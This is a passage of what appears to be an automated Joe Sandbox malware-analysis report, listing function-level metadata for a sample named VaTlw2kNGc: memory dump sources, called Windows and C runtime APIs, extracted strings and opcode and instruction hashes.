                                                                                                    • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                    • Instruction Fuzzy Hash: 76514B32A1C642C6E728FF21F8915A9E7B0BB48784FE45135EA4D87696DF3CE441CB60
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2933794660-0
                                                                                                    • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                    • Instruction ID: 2763cde2e460d71811b8eedc28c28b4342dc5aec1f1af08169427ca340403f09
                                                                                                    • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                    • Instruction Fuzzy Hash: 3D114C22B14B05CAEB009F60F8442B873B4FB59758F840E31DA2D86BA4DF7CE158C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 1502251526-0
                                                                                                    • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                    • Instruction ID: b1c7a36c953ef11851bdd318b5c5d0b248ce2edf3001a6335faead6215155775
                                                                                                    • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                    • Instruction Fuzzy Hash: A2C1D172B18286C7EB289F59B0446AAF7A1F794B84F949135DB4A47784DF3DE803CB40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $header crc mismatch$unknown header flags set
                                                                                                    • API String ID: 0-1127688429
                                                                                                    • Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                    • Instruction ID: db810cf3e37a01d7b2922cc421d4e29ddbb879a3b131afe9a396acc7e465eaaf
                                                                                                    • Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                    • Instruction Fuzzy Hash: 77F1B072A083D58BE7A9AF15E098A3ABAF9EF44740F654538DA4907B90CB3DDD80C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 15204871-0
                                                                                                    • Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                    • Instruction ID: a28763cad2116242f27553d56435eb43d3eace723c1102f572db5e92e3643fa1
                                                                                                    • Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                    • Instruction Fuzzy Hash: 42B15B73604B89CBE719DF29D8863687BB0F744B48F648961DA6D837A4CB3DD851CB10
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $
                                                                                                    • API String ID: 0-227171996
                                                                                                    • Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                    • Instruction ID: bb69e21c87eda93fbede06eb75cb30347fed121319a252075eb7746b3fae4430
                                                                                                    • Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                    • Instruction Fuzzy Hash: 77E1D332A08642C2EB6CAF25E15013DB3B2FF65B48FB40635DA0E07698DF29E857C750
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: incorrect header check$invalid window size
                                                                                                    • API String ID: 0-900081337
                                                                                                    • Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                    • Instruction ID: 9e6d69c43412f79e83af0723fe2f21f791e52c1a98b17dfce58316b269e4a20d
                                                                                                    • Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                    • Instruction Fuzzy Hash: 9591B872A182C5C7F7A99F14E458A3E7ABDFF44350FA14139DA5A46A84CB3DED80CB10
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: e+000$gfff
                                                                                                    • API String ID: 0-3030954782
                                                                                                    • Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                    • Instruction ID: f3080510bead10f36bdc78945f298b7ea496713e056a0acdd211bb891130d691
                                                                                                    • Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                    • Instruction Fuzzy Hash: 20517CA6B1C3C1C6E72C9E35A81176DEBA2F744B94FA89232CB5847AD9CE3DD441C710
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: gfffffff
                                                                                                    • API String ID: 0-1523873471
                                                                                                    • Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                    • Instruction ID: d2a228a54e65f4fefaf28cd6c334e1ca2075dab5880ca33d8d15295716180e67
                                                                                                    • Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                    • Instruction Fuzzy Hash: ADA13862B08786C6EF29DF29B0007A9BBA2EB54B84F648136DF4D47789DA3DD501C711
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: TMP
                                                                                                    • API String ID: 3215553584-3125297090
                                                                                                    • Opcode ID: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
                                                                                                    • Instruction ID: 4f8a8e68b46645ac0f452220ce5dfedfb4e33ef0dfe9aa87dc303e59db6b7a4f
                                                                                                    • Opcode Fuzzy Hash: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
                                                                                                    • Instruction Fuzzy Hash: 6E518411F08642C1FA5CBF26B92117AD2B2AF54BC4FE84436DE1E47BD9EE3CE4424624
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                    • Instruction ID: 4a5494bded34c875a04e0ee98497c897292fc449b1416adddeb64b1c5f3db54d
                                                                                                    • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                    • Instruction Fuzzy Hash: 2FB09220E07A86C6EA0D3F217C8622462B87F88700FF48038C40E81320DE3C20A58B22
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                    • Instruction ID: cd7b02a8f311b6e40875f0bf9e9a932ed604f3b30018fddbca91a7224b1f5bca
                                                                                                    • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                    • Instruction Fuzzy Hash: 0FD1B522A08642C5EB7CAF25E55027DA7B2AB65B48FB44635CD1D0769CDF3DD84BC320
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                    • Instruction ID: 6e943149aeb82b4906a2ed2e72d0c6f1027bce3957e6d3ce9d9d1ed666e96121
                                                                                                    • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                    • Instruction Fuzzy Hash: 9EC1C2722142F18FD289FB29E45957A73E1F798309BD4402AEB8747F85CA3CE414D7A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                    • Instruction ID: a9726a394100a506401ceae639d7563755900578dd1f127d6431d904e04f09ea
                                                                                                    • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                    • Instruction Fuzzy Hash: 4DB17D72A08785C5EB699F29E05023DBBB2E759B48FB40535CB4E47399CF39E44AC720
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                    • Instruction ID: 7b6d626157a4953f053095282924be9d71d07de5b75bfa0e93d1c0aa1b1774f7
                                                                                                    • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                    • Instruction Fuzzy Hash: 8F81D7B6A0C781C6D77CDF29A450369AAA2FB46794FA44236DA8D47B9DCF3CD5008B10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                    • Instruction ID: 53f0404fec62dc7fd951f9e27dd8134238777519f10a32ec3e80cfa965a00067
                                                                                                    • Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                    • Instruction Fuzzy Hash: C061EB22E0C292C6F76CAE29A45023DE6B1AF517B0FF44235D65DC66D5DE7DE8408F20
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                    • Instruction ID: c044aa7dc3f7790e888c112f0200d45b201825167beaae3fd0bbb7dc7df3c1aa
                                                                                                    • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                    • Instruction Fuzzy Hash: 6651B676A18651C2E7299F29E044238B3B2EB4AB58FB94131CE4D07798CF3AEC53C750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                    • Instruction ID: 4293852aaa45b831c14fccffad5fbac1bf981a9f9856f9c39f66963ac1cd4237
                                                                                                    • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                    • Instruction Fuzzy Hash: 76518076A18651C6E7289F29E250228B7B2EB48B68F744131CE5D477DDCB3AE843C790
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                    • Instruction ID: 0e444ecba5b3aeb6fa7d8e29e39f8dda3fcfdd442bd03ba142e7b87beff382a9
                                                                                                    • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                    • Instruction Fuzzy Hash: 3F518036A18651C6E7289F29E04423CB3B2EB49F68FB64131CE4D47798CB3AE843C750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
